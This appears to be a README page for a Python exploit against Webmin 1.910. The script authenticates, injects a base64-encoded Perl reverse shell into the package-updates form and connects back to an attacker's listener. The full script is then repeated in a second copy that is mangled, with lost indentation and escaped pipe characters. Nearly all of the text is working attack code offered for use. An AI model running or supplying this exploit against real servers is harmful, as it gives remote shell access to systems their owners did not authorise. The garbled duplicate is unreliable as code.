This is a simple exploit for version 1.910 of Webmin service that leads to Remote Code Execution

## Webmin-1.910_exploit_RCE.py
#!/usr/bin/python

from requests import post
from urllib import quote
from base64 import b64encode
from requests.packages.urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning

USER = 'USER'
PASS = 'PASSWORD'
RHOST = 'REMOTE_IP'
RPORT = 'REMOTE_PORT'
LHOST = 'YOUR_IP'
LPORT = 'YOUR_PORT'
SSL = True
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT);
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"')

def base_url():
    return '{}://{}:{}/'.format(('https' if SSL else 'http'), RHOST, RPORT)

def login():
    params = {'user':USER, 'pass':PASS}
    cookies = dict(testing='1', redirect='1', sid='x')
    response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False)
    return response.cookies['sid']

def deliver_payload(sid):
    data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
    cookies = {'sid':sid}
    headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())}
    try:
        response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)
    except KeyboardInterrupt:
        pass

def banner():
    print " __          __    _                 _               __    ___  __   ___  "
    print " \ \        / /   | |               (_)             /_ |  / _ \/_ | / _ \ "
    print "  \ \  /\  / /___ | |__   _ __ ___   _  _ __  ______ | | | (_) || || | | |"
    print "   \ \/  \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| |  \__, || || | | |"
    print "    \  /\  /|  __/| |_) || | | | | || || | | |       | | _  / / | || |_| |"
    print "     \/  \/  \___||_.__/ |_| |_| |_||_||_| |_|       |_|(_)/_/  |_| \___/ "
    print "                                                                          "
    print "   -> coded by AzraelSec (federicogerardi94[at]gmail.com)               \n"

if __name__ == '__main__':
    banner()
    print 'Connecting to {}'.format(base_url())

    disable_warnings(category=InsecureRequestWarning)

    session_cookie = login()
    print 'Cookies forged: {}'.format(session_cookie)

    print 'Attacking using this payload: {}'.format(PAYLOAD)
    deliver_payload(session_cookie)

    print 'Attack completed :)'
	#!/usr/bin/python

	from requests import post
	from urllib import quote
	from base64 import b64encode
	from requests.packages.urllib3 import disable_warnings
	from urllib3.exceptions import InsecureRequestWarning

	USER = 'USER'
	PASS = 'PASSWORD'
	RHOST = 'REMOTE_IP'
	RPORT = 'REMOTE_PORT'
	LHOST = 'YOUR_IP'
	LPORT = 'YOUR_PORT'
	SSL = True
	PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.)/){{system $1;}}}};'".format(LHOST, LPORT);
	PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}\|{base64,-d}\|{bash,-i}"')

	def base_url():
	return '{}://{}:{}/'.format(('https' if SSL else 'http'), RHOST, RPORT)

	def login():
	params = {'user':USER, 'pass':PASS}
	cookies = dict(testing='1', redirect='1', sid='x')
	response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False)
	return response.cookies['sid']

	def deliver_payload(sid):
	data = "u=acl/apt&u= \| {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED)
	cookies = {'sid':sid}
	headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())}
	try:
	response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)
	except KeyboardInterrupt:
	pass

	def banner():
	print " __ __ _ _ __ ___ __ ___ "
	print " \ \ / / \| \| (_) /_ \| / _ \/_ \| / _ \ "
	print " \ \ /\ / /___ \| \|__ _ __ ___ _ _ __ ______ \| \| \| (_) \|\| \|\| \| \| \|"
	print " \ \/ \/ // _ \\| '_ \ \| '_ \`_ \ \| \|\| '_ \\|______\|\| \| \__, \|\| \|\| \| \| \|"
	print " \ /\ /\| __/\| \|_) \|\| \| \| \| \| \|\| \|\| \| \| \| \| \| _ / / \| \|\| \|_\| \|"
	print " \/ \/ \___\|\|_.__/ \|_\| \|_\| \|_\|\|_\|\|_\| \|_\| \|_\|(_)/_/ \|_\| \___/ "
	print " "
	print " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n"

	if __name__ == '__main__':
	banner()
	print 'Connecting to {}'.format(base_url())

	disable_warnings(category=InsecureRequestWarning)

	session_cookie = login()
	print 'Cookies forged: {}'.format(session_cookie)

	print 'Attacking using this payload: {}'.format(PAYLOAD)
	deliver_payload(session_cookie)

	print 'Attack completed :)'